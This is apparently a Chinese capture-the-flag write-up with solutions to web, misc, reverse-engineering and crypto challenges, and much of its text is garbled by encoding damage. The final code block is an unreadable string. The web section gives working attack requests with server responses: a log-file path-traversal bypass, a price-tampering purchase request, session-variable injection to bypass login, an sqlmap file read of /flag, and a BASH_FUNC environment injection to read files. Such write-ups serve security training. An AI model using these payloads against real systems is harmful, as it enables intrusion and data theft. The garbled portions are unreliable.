Web
æ¥å¿éçFLAG
1
2
3
4
5
6
7
| GET /?path=/var/lologg/nginx/access.lologg HTTP/1.1
Host: vt.jnxl2023.sierting.com:31462
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
è¿å请æ±
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 14 Nov 2023 07:15:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Length: 5916
<code><span style="color: #000000">
<span style="color: #0000BB"><?php
<br /> highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);
<br /> print(</span><span style="color: #DD0000">"FLAGå°±ååšäºæ¥å¿æ件éåŠïŒ"</span><span style="color: #007700">);
<br /> if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">])) {
<br /> </span><span style="color: #0000BB">$path </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">];
<br /> if (</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/flag|\$|["\']/i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">)) {
<br /> echo </span><span style="color: #DD0000">"é误"</span><span style="color: #007700">;
<br /> } else {
<br /> </span><span style="color: #0000BB">$path </span><span style="color: #007700">= </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"log"</span><span style="color: #007700">,</span><span style="color: #DD0000">""</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);
<br /> if (</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)) {
<br /> </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">);
<br /> echo </span><span style="color: #0000BB">highlight_string</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">true</span><span style="color: #007700">);
<br /> } else {
<br /> echo </span><span style="color: #DD0000">"æ件äžååš"</span><span style="color: #007700">;
<br /> }
<br /> }
<br /> } else {
<br /> echo </span><span style="color: #DD0000">"请æäŸæ件路åŸ"</span><span style="color: #007700">;
<br /> }
<br /></span>
</span>
</code>FLAGå°±ååšäºæ¥å¿æ件éåŠïŒ<code><span style="color: #000000">
flag{218d68ad69314eefba9bf508193fbbe9}<br />100.64.0.3 - - [14/Nov/2023:07:13:55 +0000] "GET / HTTP/1.1" 200 3734 "http://jnxl2023.sierting.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-"<br />100.64.0.3 - - [14/Nov/2023:07:13:56 +0000] "GET /favicon.ico HTTP/1.1" 200 3734 "http://vt.jnxl2023.sierting.com:31462/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-"<br />100.64.0.3 - - [14/Nov/2023:07:14:55 +0000] "GET /? HTTP/1.1" 200 3734 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-"<br />100.64.0.3 - - [14/Nov/2023:07:14:55 +0000] "GET /favicon.ico HTTP/1.1" 200 3734 "http://vt.jnxl2023.sierting.com:31462/?" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-"<br />100.64.0.3 - - [14/Nov/2023:07:15:08 +0000] "GET /?path=/var/lologg/nginx/access.lologg HTTP/1.1" 200 5189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-"<br />100.64.0.3 - - [14/Nov/2023:07:15:08 +0000] "GET /favicon.ico HTTP/1.1" 200 3734 "http://vt.jnxl2023.sierting.com:31462/?path=/var/lologg/nginx/access.lologg" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-"<br /></span>
</code>
flag{218d68ad69314eefba9bf508193fbbe9}
|
èŽä¹°FLAG
1
2
3
4
5
6
7
8
9
10
11
12
13
| curl --location 'http://vt.jnxl2023.sierting.com:32513/api/console_value.php' \
--header 'Accept: */*' \
--header 'Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6' \
--header 'Cache-Control: no-cache' \
--header 'Connection: keep-alive' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--header 'Cookie: username=U489131' \
--header 'Origin: http://vt.jnxl2023.sierting.com:32513' \
--header 'Pragma: no-cache' \
--header 'Referer: http://vt.jnxl2023.sierting.com:32513/shop.php' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0' \
--data-urlencode 'username=U489131' \
--data-urlencode 'value=100000000'
|
èŽä¹°flag
1
| flag{9c7b5d02c16b40458e81ae57c664076f}
|
äžåªå°èè
ä»»æçšæ·ç»åœ
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST / HTTP/1.1
Host: vt.jnxl2023.sierting.com:31998
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=jib3igrmjs3455csfmpceh5fq6
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Length: 0
_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=12345678912345
|
http://vt.jnxl2023.sierting.com:31998/admin/admin.php
http://vt.jnxl2023.sierting.com:31998/admin/admin_catagory.php?action=child&channel_id=1&parent=1
sql读å/flag
sqlmap -u âhttp://vt.jnxl2023.sierting.com:31998/admin/admin_catagory.php?action=child&channel_id=1&parent=1â --cookie=âPHPSESSID=0iq3e4fekj42fss2hhnoqjpmo1â -D qsnctf --file-read â/flagâ
1
| flag{27e81dee3a91e5e39bd633147fa39f1c}
|
Better_php
åéå
1
2
3
4
5
6
7
8
9
10
11
12
| POST /adca4977cb42016071530fb8888105c7.php?query=select REPLACE(REPLACE('select REPLACE(REPLACE("B",0x22,0x27),0x42,"B");',0x22,0x27),0x42,'select REPLACE(REPLACE("B",0x22,0x27),0x42,"B");'); HTTP/1.1
Host: vt.jnxl2023.sierting.com:32234
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: textml,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
env[BASH_FUNC_echo()]=() { sed p /*1*
|
ååºå
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| HTTP/1.0 500 Internal Server Error
Date: Tue, 14 Nov 2023 08:26:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3261
<code><span style="color: #000000">
<span style="color: #0000BB"><?php<br />error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);<br /><br />foreach (</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'env'</span><span style="color: #007700">] as </span><span style="color: #0000BB">$key </span><span style="color: #007700">=> </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {<br /> if (</span><span style="color: #0000BB">blacklist</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)) {<br /> </span><span style="color: #0000BB">$a</span><span style="color: #007700">=</span><span style="color: #0000BB">putenv</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #007700">{</span><span style="color: #0000BB">$key</span><span style="color: #007700">}</span><span style="color: #DD0000">=</span><span style="color: #007700">{</span><span style="color: #0000BB">$value</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);<br /> }else{<br /> echo </span><span style="color: #DD0000">"Hack!!!"</span><span style="color: #007700">;<br /> }<br />}<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />function </span><span style="color: #0000BB">blacklist</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">){<br /> if (</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/ls|x|cat|tac|tail|nl|f|l|a|g|more|less|head|od|vi|sort|rev|paste|file|grep|uniq|\?|\`|\~|\@|\.|\'|\"|\\\\/is'</span><span style="color: #007700">, </span><span style="color: #0000BB">$a</span><span style="color: #007700">) === </span><span style="color: #0000BB">0</span><span style="color: #007700">){<br /> return </span><span style="color: #0000BB">true</span><span style="color: #007700">;<br /> }<br /> else{<br /> return </span><span style="color: #0000BB">false</span><span style="color: #007700">;<br /> }<br />}<br />include </span><span style="color: #DD0000">"./index.php"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">?><br /></span>
</span>
</code>welcom to ctf!!!
flag{3af85c0ee5bef9ead47d74ae21913771}
flag{3af85c0ee5bef9ead47d74ae21913771}
CONST.php
adca4977cb42016071530fb8888105c7.php
conn.php
index.php
index.php.bak
|
1
| flag{3af85c0ee5bef9ead47d74ae21913771}
|
Misc
æ¶éŽäžå€äº
1.é件äžèœœäžæ¥åïŒè§£ååºæ¥çå°äžå äºç»Žç ïŒå¯ä»¥å°è¯ æ¹éæ«æã
2.å°æ«æåºæ¥çbase64解ç åŸäžäž²æŽåœ¢å笊䞲ã
3.åšè§£ååºæ¥çåŸçäžè¿æ䞪æ¥ååŸçïŒåçäºçé¢ç®æè¿°ïŒå¯ä»¥å°è¯æ ¹æ®æ¥åç»åŸ
â ç»åºæ¥åå°±äžäžªäž²flag(è¿é¢å€ªæœè±¡äº)ã
flag{DATESO}
Datas_secret
1.æ¯äžéç£çåæé¢ã
2.çŽæ¥äœ¿çšR-Studio å·¥å
·æè
volatilityå·¥å
·éœå¯
3.è¿éæ¯äœ¿çšR-studioå·¥å
· ïŒä»æ¡é¢äžïŒå°±èœæŸå°flagæ件
åå£çæ段
Reverse
BabyRe
1
| flag{12246231b2e4b2544ff2f4ec36f343e9}
|
TEA
EasyRe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| # -*- coding: utf-8 -*-
import time
from tqdm import tqdm
from qsnctf import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def aes_decrypt(ciphertext, key):
key_bytes = key.encode('utf-8')
cipher = AES.new(key_bytes, AES.MODE_ECB)
decoded_bytes = base64.b64decode(ciphertext)
decrypted_bytes = unpad(cipher.decrypt(decoded_bytes), AES.block_size)
return decrypted_bytes.decode('utf-8')
ciphertext = "YC0ky5H1iE/1yvolTcavHPt8cla5DakNyXBlET1QXbnxQm3u7VVHlZjUc5XzVH6grI5HOoYPab0v\neu/TDaAPtg=="
key = "ThisIsASecretKey"
decrypted_text = aes_decrypt(ciphertext, key)
print(decrypted_text)
|
1
| flag{644b1f007a595ec4923b0a7de6fc809a}
|
Crypto
EasyRSA
1
| QhS9n7TkavmU8E4CFa872ZzqIq/NG/agtCkxQBzB0/E1PDZRv6otOYxBLsxwd/7h0fPkYYMCpPt4nXqYBGQ/n8/F3q3spV94+IFs7+CjyybUvAQg8MXLgSTzVt+ua0Ub0/et5/7Q1xAcgzT3/jWHwjklEAykdpSYMAqv5PQrhT4=
|
1
| flag{c2915ff0a0ca8ffd50af20cd27682ff2}
|
BabyRSA
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| import libnum
import gmpy2
c1= 295658788074157816670393593671184451782123605135184996662528766686642109492132533952160456440919197939935742027629210419312032730004032666912404179229952394343569590488768472800784830058534578639706805456277578757250365834591813481786084959844340418320620440636997732915872346619679993987903742079972676425404864295283955565746004124045155664762158516005326368384488346997494926539295740248007606864906884407198601326915643000764477435205579583836917598642053869541648731754384026407310786288997756775232852732033054591953078116290088267188296560877481534143707414153749140670404213262630122369941889862912426176115220410931992046973925991075473656781794097329513119548617920256625579072719981729556158392454956362838720993254919638177786730004086883044525967823454986241038123671907279715773848673713008902432841449556980494600938989397567019338970200872333713986608537678650318511128703055185979834233315117153115613952940778789222515375743186066883492596068186378372611075958909412662251913621375996518671118244409393829141365207153662416265238312206577474940661548038715230313608405518108581922154335405303862701783678336161505643508831482409054761542959278392940037561736468155509922530420964726953308604138731805543997557197893
c2= 219454357017359138238563345020257296433275019950745269658921329153689267055871241202626317639487122341365759606018366576305678949982408366815977617307888894995289951707241009621444691307275542686770303994110416384086739599181934011812163156338859395115724413628620575935425221522079154607411877822646179457455118804970038865452163833416447505142114976758532806787419762250921421272492466133659234602794242531776209324085944417173098820895755851386042954303555790085402616519592065446023510096773546730662074307900123349548340507067971393642039476326402523930789953483843698593104578179169624886357604650615249286150367204109726460230037005175927865466199600272190112483494387929732049738312695796015009178606906549093365261114132002222704510637261038978031857378729856467918978246977163353146981239215886053379980533235786905270211605457443266127512667882149285155542735532327780898540341696557860555884277608448996773250847560675650046440569736010800155992053362696097992699863059686881689842065077997427372972290872427656847223849769329713841670853267584161386494525686204330028142217737052411422895042170169703550774908415280261731967511925122636118468176645781785352430657090024109246103061415446942211482659025722233229083093876
n= 549785700554963543393222974982211136067042846536450239199968863551137077564447156832697813202963334596948298760762991663065504535035143397250208506445202607659676332816610122258862787906629525548439909792727593939957178783466989816894454522630301104349317697612174888605090061231211194974337772507249418567229560145454791075929946332668360553910328900103264562348881791004831033587660163923517440406942993348972589262051083908075790422096042338651001937740085414301019827335549437397656318095919875053213333008551761167437683250592542156348138055482054331330609375930693247365749085041596578748797801601289693449629548744535914348450016287545136436964138806081283470239420969311905998245715160353982174880912315601876305613349276824998688275587308133069178764001924866079232824850209407236694426779262951463035278887804883917516580169051530590466082511045503107508117656821592538792566264160105940730326929474477787053681516844548383814388361089499629312831727731267796167205124844987064389097138747938870221504684958713047985374714612321540288239995935347905120710583169131356970267386562665138437631517802641426575996558648777831102462652517305151412695166331935115971277205305816897886952646432233312318756155702046584205507027737
e1 = 3247473589
e2 = 3698409173
def exp_def(e1,e2,c1,c2,n):
s,s1,s2 = gmpy2.gcdext(e1, e2)
m = (pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n
return int(m)\
m=exp_def(e1,e2,c1,c2,n)
print(libnum.n2s(m))
|
1
| flag{baby_r3a_sierting_2023}
|
ç®åçPython
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
import time
from tqdm import tqdm
from qsnctf import *
flag = "ðð€ð§ð®ðð©ðð°ððð£ðððŸð¯ððð§ðð«ððšðð®ðð»ððððð£ðªðð¢ðððð§ðšððð»ð
ðððšðððð¡ðžð¯ðð©ððŒðð£ððððð§ððð€ð§ð¹ððœðð°ðð¢ððððŸððŠðððð®ðððð«ððŒðð£ðð£ð£ð¬ðð©ð«ððððð¿ððŸð°ððð£ððªðð£ðððððœð«ðð£ ðð
ððŒð§ððð€ðšð§ððšðð¿ðð¢ðð¡ððð£ððð¡ð
ðððšð§ððð€ðœð¢ðð§ð¬ðŸðð©ðšð«ðð©ðð¿ðð±ðœðððŒðŠð®ðð¡ðœðððœð
ð©ððŸðððð€ð¯ððð€ð§ððð§ð§ð¯ððœðððððð©ðð¡ðžðšððšð§ðœðð£ð
ðððœð§ððð€ð«ð®ðð©ðððððððð¢ððððŒðð ððšððªððŸð£ððð€ððððšðð«ðð©ðð°ðð¥ð
ðððœðððð£ðððððð«ððŸðœð
ðð£ðð§ððððððððððŒððððœððª ðð¡ððððððððœð§ðððð§ð°ððð¹ððð©ð
ðªððŒðð¡ðð£ðððð£ððºðð£ðð¯ðð£ð
ððð£ðœð¬ðð€ð«ð¢ðð£ðð«ðð£ð£ðððœðððð©ð¯ðððšðð©ððœðð ðð¥ð¹ððð£ððððšðððð£ððððŒð§ððð¢ððððœððšðð¢ðð£ðð£ðððð¢ðð®ððŸðŒð±ðð¢ð£ððð¿ð¹ð¿ðð»ððððšðð¬ðð€ðððð±ðð±ððð¯ðŠððšððŸðð¥ðð
ððŸððªðð¡ð¹ðªð
ðœðð°ððŸð«ððð§ð§ðððð¯ðªðð€ððŸðð€ððððð§ðððŒððððœðð©ð
ðð
ð ðð€ð°ðªðð©ð¯ððððð¯ðð£ððððœð§ððð¢ðð®ððšð£ð©ðð¢ð«ððð£ð§ð¯ðð€ðšðŸ ðð©ðððð»ððððšð§ð©ððððœððŸð
ð¿ðððððð§ð§ðŠðð¢ðððð©ððŸðð¥ðððð©ððððð§ððð£ððððŸð°ð ðððð¿ðð©ð¬ððð£ðð¿ðð£ðððð£ð§ð¿ðððœððð€ðœð¿ðððð ððð¹ðððð¹ðððšðð«ðð¢ððððððððð¬ðŠððœð¢ð¯ðð¢ðððð¢ð§ ð±ððŸðªðšðð§ðšððð±ðœðððð¹ððð¢ððððœððªððœðð ðð¥ð¹ð¯ððð¯ð¢ððšð£ððð£ðððððððððð®ððœðð°ðð»ð¹ðððð§ð°ðð§ðð®ððŸðŒð¯ðð¿ððððððŸðððððð©ððŸððŸðð
ðð¥ð¹ððð€ð«ðððšðð«ðð¢ðð¡ððð¯ððð£ððŠððœðð ð
ðð°ððð€ðððððªð¬ðð¢ðšððð¥ð§ððððððð§ðððððð©ððððððšð§ðððŸð¯ðððððœð
ððððð©ðð§ðð£ðð¹ððšððªðð»ðð¡ðððð§ðð©ð«ð¢ððŸððððŸðœððð±ðððð§ðð©ððœðð©ððŸð«ðððªð¹ððð£ðð«ðð©ðœðððð§ððð©ðð ðððœð®ððœðððð£ðð£ðð€ððšðð©ðªðšððœðððð¥ððððªðð©ðð¢ððŸððšððððŸðððððððððšð«ðð©ððŸððð£ð¢ ððªððŠðð£ðð®ððšðð«ððŸðœðððœð§ððð§ððŠðð£ðððð¢ðððððððð§ðð¬ððšð§ð¿ððŸðð
ððŒðð©ðð€ðšð§ððšðð¯ððð£ððð©ðððð€ð«ð®ððšððšðð€ð°ððð€ð¯ððð§ðð¢ððŸðð¿ðð£ð£ðððððšðððð¯ððœðð©ððœðð
ðð£ðððð¢ðð«ððšð
ð¿ðð¢ððððœð§ð§ðð¢ððððšðð«ððŒððððð§ð§ðð€ð«ðŠððœðð«ððœðððððð»ðð£ððððŸðð¿ðð€ð§ð
ððšðð®ððð ð§ððšðð¿ðð£ðððð§ðððð¥ð§ððð£ðð®ðð¥ðð£ðð€ðð°ðð¢ðð¢ðð©ðŒð±ðð¡ðððð©ðððððð¢ððšð
ðªðð€ð§ðððªððððð¯ðŠððšððŸðð¥ððððŒð§ðªðð€ðšððð£ð£ððð£ð
ððððœð±ðð©ð¬ðŠððšððððð¹ðððŒðð©ðð¡ðððððð«ððœð
ððð£ðððð¢ðððððð°ðð¢ððððŸð¯ð©ðð¢ððððœðððð¥ðð£ðð€ð«ðªðð©ð¬ð¢ððœðð®ðð¡ððððœðððð©ðšðœðððð©ð ðŸðœððð©ðððððð¯ððšðð¯ððŒðð ðð€ðððð£ððºððšðð«ððð¹ððððšð«ðð£ððŠððœðð¿ððœð£ððððððð¡ðœðªð ðšð§ð¿ððððððððððð¹ððð©ðð¿ðð¢ððððŸð¯ððð£ðð
ððð£ððððððð£ðð°ðððð¢ðð€ðœðªðð£ðððð©ðð§ðð» ðœðððœðð©ððœðð ðð¥ð¹ð®ðð€ð«ððð€ðð¯ðð¥ðð¡ðððððððð®ððœðð«ððŸð°ððð£ð§ð§ððððððððððŒððððœð§ððð§ððððœðð«ððŒð¬ðððð£ðªðð£ððððŸðŒð¯ððŒððððŸððŠðð¡ð¹ððð£ðð¬ððœðð¢ððœð£ðªðð©ð¬ðððœðð«ðð¥ð£ðððšð§ð©ðð¡ððœðð£ðœðšðð£ðððð£ðð©ððœðððð€ðð®ððððððð¯ðªðððœð®ððððððŸð°ððððð¿ððð¬ðððŸððœðð¿ ð
ððððœðððð¯ðªðð£ððªðð€ððððªðžð¯ðððð«ððšðð°ðð£ð£ðððŸðððð¢ððððð§ðððŒð«ððð¢ð¬ð±ððððŠðð¢ðšðððœððððŸð
ð«ðð¢ðððððð©ððœðð ððŒð§ððð€ð¯ð¢ððšðð¯ðð£ðð¢ððŸðððððð«ðððððððððð¢ð£ðªðð€ð§ððð¢ðšð¿ððŒð¯ððð¥ðððð§ðððð£ð§ð¿ðð£ððððð§ððð£ððºðð¢ð¬ððððð¡ððððŠðð¡ððŠððšðð®ðð¢ð«ð
ððœð§ ð§ððððºðð¢ðšððððððð€ðð±ðð€ðšðœððððªðð£ð§ð ððœðð±ððð§ðŸðð©ð
ððð¥ðððð€ðððð£ððŠðððððð€ðœððð¢ð§ððð©ð«ðŠðð€ðð¿ððŸððððŸððððððªððšððððœððððœð§ð¬ððððððšðð«ðð¥ð
ðððœððððððððœð£ð ðð¢ð°ðððð§ðšððŸð¯ðŠððððªððœð£ðððªðððððœðððšðð©ððœðððð£ððððœðððð§ðšðŸðð¥ðð¢ðð±ð£ððð€ð¯ðªð
ðð£ðððŒð
ðððð§ððððððððððð¿ððððœð§ð¿ððŒððððŸð
ðœð
ððð
ððð®ð±ðð€ð¯ððð§ðšð¿ðððððððððð¢ð ðŠððšððšðð€ðœðððœð§ðšðð§ðð¢ðð©ððŸðð»ð
ððð¡ðððð»ðððð€ð
ðððœðððð£ðð±ððððððšððªðð¥ðð ðð€ðððð€ð¯ðððððððŒððððððððŸð¬ðððŸððŸðð¥ð¹ðððœð§ðªððšððððšð£ððð€ð£ð
ððšðððð©ð«ðððšðð¿ðð¢ðð¡ððŒ ð¬ððð£ððŸððœð§ððð¿ð
ðððŸðð±ððŸðšðŠðð©ðŒð±ðððððð€ðð§ðð»ðœðððð
ðªððœðð ðð©ððŠððð«ðððð£ðððœ ðððððððð€ðªðšðð£ð£ðððŸð°ððð±ðœððð§ðððð©ðð¿ðð¡ðððð©ðððððððð£ð§ðŸððŸð£ðððð§ð©ðð£ððšðð©ðð°ððððððŸðððð€ðšðððšð£ð©ðð¥ð
ððð€ð«ðªðð€ðšð§ðð§ðšðŒðð¢ððððð¹ð¿ðð©ð¯ðððœðð¬ðð£ðð
ðð€ððŠðð¡ð¹ ððð©ð
ðªððŒððððŸðððððð®ðð£ððªðð¿ððððð£ð«ððšððªðð©ðŒð°ðð¿ð¹ððððð¯ðð§ððªðððœð¬ððŒð¬ð ðð¥ðžð®ððœððððšðð©ðððð
ððœðððð€ðšðŠðð£ðð«ðððð£ðð£ðð±ðð©ð¯ð®ððððŸððð§ððð£ðððð¡ððððœðð©ðð€ð«ððð§ððððð«ðŠðð§ð¬ðŸðð£ððððŸðððð¡ð¹ð®ðððð°ððŸð°ðððð§ðððððŠðð©ðð¿ðð¢ð°ððð£ð§ð±ðð¡ðœððððœðŸððœ ð
ð ðð¥ðžð©ððšðððððŒð¯ðð¥ð
ðððŸð¯ðŠðð¢ðð®ððœðððð¥ðððð£ðð©ðð€ð«ð®ððœððªðð¡ðœððððððððððð© ð
ðŸððœððððŒð§ðððð§ð¹ðððð¯ðð¿ðððð£ð§ðŠððð¯ðððœððŸðð€ðœð¢ðð»ðœð¿ðð€ð¬ðððšððððœðððððð±ðð£ððªðð€ðœðœðð£ðð ððð¹ðððððððšð£ððð¢ððððððððð«ðððšððªðð£ðð¢ðð§ð¬ðŸðð£ðð¢ðð£ððððªð§ððððð ðð±ðžð¯ððœððððŸðœððð©ððððð«ð¢ðð©ðð¯ðð¥ðœððððððð¢ðð®ððœð§ðððŸð«ððð±ðœðððð¯ðªððððððŒð¯ð ððšð§ððððð¢ðð€ðð¿ðð£ð
ððððð±ðð€ð¯ðððšðð«ðð¥ð
ðððŸð¯ððð€ðšðŠððœðð«ðð¿ðð ððððððð«ð§ðð§ðšððð»ðððð©ðððð¢ððððŸðððð£ð§ððððŠð±ðð¡ðœðððšðð¿ðð¢ðððð¢ð§ððð£ððœððœððªðð»ððððð¯ððð©ð¯ð¢ðð£ ð
ðœð
ðððððœðð¿ðð¢ðððððð¿ððŸð§ð ðð¥ð¹ððððšð«ððšððªðð¥ðððð£ð§ððð¢ððððœððšðð€ð«ðððððšððŸð¯ ðððŒðšð«ððŸð°ðððªððððððªðð©ð
ðŸðð€ðœðððœðððð€ðšð±ððððªððœðððð±ð£ðððð§ðŸððšð¢ð®ðð€ðœððð¢ð§ ðððŸð§ððððŒð°ðð£ð
ððð£ð§ððð©ð¯ð®ððšð§ðŸððœð
ð
ðð€ððšðð€ð¯ð¢ððšðŒð¯ððœðððð©ðððð€ð¯ðððšðð®ððœð
ð¡ððð¯ð°ðð©ð¯ð¢ððšðð¬ðð£ðððððð®ðð§ðððð©ð
ðœððœð§ð
ðð¥ð¹ð©ðð¡ðð±ððœð
ð¿ðð¢ðð£ðð€ððŠðððœð®ððšðð ðððððð¢ð¬ð§ðð€ð«ð¢ðððððð£ðððððððð©ð¯ðððœðð©ððŸð¯ððð±ðŒð§ðððœðŠðð©ðœðªðð£ððððŒðððð£ððŸðð£ðð©ðð€ðœð¡ðð¢ððŸððŸð¯ððð£ðð¬ðððððð£ð§ððððœððð¢ðšððð¢ð¬ððð¢ð§ðððð«ð¢ðð©ððªðððððððððð¡ð¹ðððð£ððð€ðœðððŒð§ðšððð§ð¬ðð©ððððð¹ððð¢ð§ððð±ðœð®ððð
ð«ððœð
ð
ððŒð§ðððšðð§ððšðŒð®ð
ðððð ðœðððð§ððððœððšðð¥ðððð£ðð¬ððŒðð¬ðð©ððððŒð£ððððððð¡ððððœðð©ðððððð¿ð¹ððð€ð§ðŸðððððð¢ ðððð¢ð¬ð§ðð€ð¬ð¹ðð£ðð¯ðð£ðððð§ðð«ððð¬ðððœðð¿ððŸð°ðððšððªðð§ððððšðð¬ððŸððððœð¢ð°ðððšð§ðð©ððŸðð¥ð
ððð¢ðððð¥ð§ðŸððœðððð¢ð«ððð¢ð¬ð¿ðð¢ððŠðð§ð§ð¯ðð¡ðððð£ððºðððð
ððœð§ððð€ððððšððððœððððšððððœðð£ðð§ðððð€ðšðððœðð°ððŸð°ððððŠð©ðð¢ðð¬ððððªðð¥ð§ðððœð§ð±ðð€ðšðŸðð£ððªððŸð£ðððŒððð ðšððððšðð¯ððœððððšð§ððð£ððŠððð§ðððŸðœð
ðððð±ðð©ð¯ð¢ððšðð®ð
ðððððœð§ð©ððŸð¯ðððŸðð±ððœðð ððŸððððð§ð¹ððœð
ðŸðð£ð£ð ðð¢ð¬ðŠððð¯ððð£ððððð§ð
ðð£ð§ððð¢ððððððððœððððšð§ðªððð¯ðððð¬ðð ðœðððð¢ððððð¹ðŠððšðð®ðððœððð©ðððð¡ð
ðŠððœð¢ð°ððð°ððð¢ðð§ðð€ð¯ððð§ðšðððð§ððððððð±ðœðððœðð¬ðð£ð
ð ððªððŠððð§ð¯ðð©ð
ðŸðð¥ðð£ððŸðð§ððððððœðððð»ð¹ððð»ðœððð¢ððððšðððð£ððððŸððð ð§ððŸðð¢ð°ððð£ðð£ððšðŠð°ðð€ð§ðŸðððŒð¯ðððððð¢ð§ððð¡ð
ðððšð£ððð¥ðððð£ð§ð¯ðð©ð§ððð§ðšððð¡ðððð¥ðð©ððð¯ððð¢ð¬ðððœð§ð ðð¢ð§ððð€ð«ðððšðð¯ðð¿ð
ððððððððððððððððð ðððð¬ðð£ðð®ðð€ðððð£ðððððœðððððªð
ð£ðð«ððœð
ð
ððšðð¯ðð£ðð«ðððð¯ðð£ðð¡ðð±ð£ððð¡ð
ðððœðððð¥ð
ððð¢ð¬ð¿ðð©ð¯ðŠððððŸðð¥ð£ððððŒð®ðð»ððððšðð¬ðð¢ð¬ðððððððœðððð§ð¬ðªððœððððððððððŸððððððŸð«ððð£ð§ð§ððð¯ ðððððªððŸðððð¥ððªðð¡ðœð®ðð©ðœðŸðð¢ð¬ð
